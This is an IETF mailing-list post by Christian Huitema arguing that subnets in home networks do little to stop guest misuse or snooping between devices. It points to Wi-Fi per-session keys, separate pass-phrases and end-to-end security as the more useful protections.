> Assume we agree on the needed functionality. It is hard to > disagree and many of us have seen the need to isolate some > people and apparatus from others, and to assign different > capability to them, for many years. People want security, and the threats that Michael mention are real: children spying on the parent's traffic, guests abusing the access to do something illegal on the Internet. But subnets are not a particularly efficient way of solving these threats. Take the issue of guests abusing the privilege and engaging in illegal action. The concrete risk is that men in black will knock at your door and ask about said actions. Picture yourself arguing that "it obviously wasn't me, because the packets come from the network that I provide to my guests". The men in black will not be impressed, since you obviously have access to all the networks in your house. Your only defense will be to rat a specific guest, supposing of course that you are so enclined. Subnet or no subnet will no help you do that. Access control and logs will help, but these are not tied to subnets. Consider then the attacks between computers on the same network. Michael mentioned traffic snooping. But modern Wi-Fi network are protected against that already. They negotiate different per-session keys. Even in promiscuous mode, the Wi-Fi card does not see the unicast traffic of the other stations in the network. In home networks, the key is derived from an initial 4-ways handshake, secured by a pass-phrase. Most deployments use a single pass-phrase today, so teenagers could indeed develop tools to crack the exchange. But nothing prevents using different pass-phrases for different group of users. The other risk are the active attacks between connected computers. However, as John pointed out, there is lot of demand for connectivity between computers in the home. Many people have tried to engineer network topologies that follow organization or authorization boundaries, but the mostly that makes your network expensive to run without really solving the issues. Also, ultimately, all forms of topology based control rely on the security of the home router. Do you really believe that a teenager who is clever enough to hack into Wi-Fi access protections will not also be able to hack into the home router? If we want actual protection, it is probably much easier to use end to end security. And in your own house, you might consider forms of social control, as in "OK, you hacked my computer, give me the keys of your car..." Frankly, I don't see users managing subnets any time soon. -- Christian Huitema _______________________________________________ Ietf@xxxxxxxx https://www1.ietf.org/mailman/listinfo/ietf